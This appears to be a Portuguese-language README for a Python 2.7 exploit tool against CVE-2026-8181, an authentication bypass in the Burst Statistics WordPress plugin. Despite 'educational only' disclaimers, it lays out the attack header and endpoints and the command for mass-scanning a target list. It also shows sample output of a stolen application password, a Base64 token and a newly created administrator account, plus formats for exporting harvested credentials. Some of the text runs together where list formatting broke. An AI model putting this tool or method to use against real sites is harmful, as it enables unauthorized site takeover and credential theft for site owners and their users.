
CVE-2026-8181: Bypass de Auth do Burst Statistics → takeover da API REST e criação de admin. Python 2.7. Apenas para uso educacional.
Python 2.7 exploit para a vulnerabilidade do plugin Burst Statistics (CVE-2026-8181) que permite a atacantes não autenticados contornar a autenticação da API REST, recuperar senhas de aplicativos e criar novos usuários administradores em sites WordPress vulneráveis.
⚠️ Aviso
Esta ferramenta é apenas para fins educacionais e de teste de segurança autorizado. O acesso não autorizado a sistemas informáticos é ilegal. Use apenas em sites que você possui ou para os quais tenha permissão explícita para testar. Mais avisos: Você pode ver o aviso na capa de Jenderal92. Pode verificá-lo AQUI !!!
O CVE-2026-8181 afeta o plugin Burst Statistics para WordPress (versões anteriores ao patch). A falha reside no mecanismo de autenticação da API REST, permitindo que um atacante:
X-BURSTMAINWP manipulado/burst/v1/mainwp-auth/, , )/wordpress/wp/wp-json/wp/v2/users ou redirecionamentos por ID de autorres_login.txt – Credenciais REST API concisas, separadas por pipe (fáceis de analisar/importar)full_res_login.txt – Relatório completo legível por humanos, incluindo verificação de acesso e senhas de aplicativosrequestspip install requests
Prepare um arquivo de lista de alvos (um domínio ou IP por linha, com ou sem http:///https://).
Exemplo targets.txt:
example.com
https://vulnerable-site.com
127.0.0.1/wordpress
Execute o exploit:
python2 CVE-2026-8181.py targets.txt
res_login.txt – Credenciais REST API (uma linha por alvo vulnerável)full_res_login.txt – Relatório detalhado| Argumento | Descrição |
|---|---|
list.txt | Caminho para o arquivo que contém as URLs alvo |
============================================================
CVE-2026-8181 - Burst Statistics Auth Bypass Exploit
============================================================
[*] Total targets: 2
[*] Threads: 10
[*] Base paths: ['', '/wordpress', '/wp']
[*] Scanning: example.com
Trying path: /
Detected username: admin
[+] VULNERABLE! REST API bypass successful
[+] Application Password obtained!
[+] Username: admin
[+] App Password: xxxx xxxx xxxx
[+] Base64 Token: YWRtaW46eHh4eA==
[+] Access confirmed: WordPress settings
[+] Access confirmed: Installed plugins
[+] Access confirmed: Admin users
[+] Admin user created via REST API: wp_abc123
[+] Results saved to res_login.txt and full_res_login.txt
res_login.txt – Credenciais REST API ConcisasCada linha segue este formato separado por pipe:
alvo|nome_utilizador|palavra_passe|email|id_utilizador
Exemplo:
http://example.com|wp_xyz789|AbC123xyz456|[email protected]|42
Este formato é ideal para:
cut, grep ou Excelfull_res_login.txt – Relatório Detalhado CompletoPara cada alvo vulnerável, o script anexa um bloco legível por humanos:
============================================================
Target: http://example.com
============================================================
[+] Access Verification:
[+] WordPress settings
[+] Installed plugins
[+] Admin users
[+] REST API Credentials:
Username: wp_abc123
Password: random12char
Email: [email protected]
User ID: 42
URL: http://example.com/wp-admin/
Note: Use with X-BURSTMAINWP header
[+] Application Password:
Username: admin
App Password: xxxx xxxx xxxx
Base64 Token: YWRtaW46eHh4eA==
Nota: Se o endpoint de senha de aplicativo não estiver disponível ou não retornar nenhum token, essa seção mostrará
FAILED.
http:// se estiver ausente, remove barras finais./, /wordpress e /wp como diretórios base do WordPress./wp-json/wp/v2/users ou usa redirecionamentos ?author=N.X-BURSTMAINWP: 1 + autenticação Basic com nome de utilizador e palavra-passe fictícia (CVE-2026-8181). Se o endpoint /wp-json/wp/v2/users/me?context=edit retornar 200, o site está vulnerável./wp-json/burst/v1/mainwp-auth para recuperar um token de senha de aplicativo./settings, /plugins, /users.POST /wp-json/wp/v2/users.res_login.txt e detalhes completos em full_res_login.txt.Pode modificar estas variáveis dentro do script:
THREADS – Número de threads simultâneas (padrão 10)BASE_PATHS – Subdiretórios adicionais do WordPress a verificarrequestsEste projeto é fornecido apenas para fins educacionais. Use por sua conta e risco.